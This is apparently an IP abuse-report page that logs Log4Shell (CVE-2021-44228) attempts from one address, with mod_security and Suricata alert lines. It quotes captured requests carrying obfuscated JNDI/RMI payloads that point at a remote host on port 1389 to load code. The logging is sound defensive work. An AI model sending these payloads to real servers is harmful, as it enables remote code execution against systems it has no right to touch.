This IP carried out Apache Log4j RCE attempt(s) (also known as CVE-2021-44228 or Log4Shell). For mor ...
show moreThis IP carried out Apache Log4j RCE attempt(s) (also known as CVE-2021-44228 or Log4Shell). For more information, or to report interesting/incorrect findings, give me a shoutout on @parthmaniar on Twitter.
show less
(mod_security) mod_security (id:932130) triggered by 194.163.154.164 (DE/Germany/vmi624754.contabose ...
show more(mod_security) mod_security (id:932130) triggered by 194.163.154.164 (DE/Germany/vmi624754.contaboserver.net): 1 in the last 3600 secs
show less
6 requests, including :
GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F144.202. ...
show more6 requests, including :
GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F144.202.34.<<removed>>%3A1389%2FBinary%7D HTTP/1.1 Referer="${${lower:jndi}:${lower:rmi}://144.202.34.<<removed>>:1389/Binary}" User-agent="${${lower:jndi}:${lower:rmi}://144.202.34.<<removed>>:1389/Binary}"
GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A%3A-r%7D%24%7B%3A%3A-m%7D%24%7B%3A%3A-i%7D%3A%2F%2F144.202.34.<<removed>>%3A1389%2F%23Binary%7D HTTP/1.1 Referer="${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.<<removed>>:1389/#Binary}" User-agent="${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.<<removed>>:1389/#Binary}"
show less
DE_MNT-CONTABO_<177>1640115730 [1:2034808:1] ET INFO Possible Apache log4j RCE Attempt - Any Protoco ...
show moreDE_MNT-CONTABO_<177>1640115730 [1:2034808:1] ET INFO Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1]: <seconione-ens192-1> {TCP} 194.163.154.164:53480
show less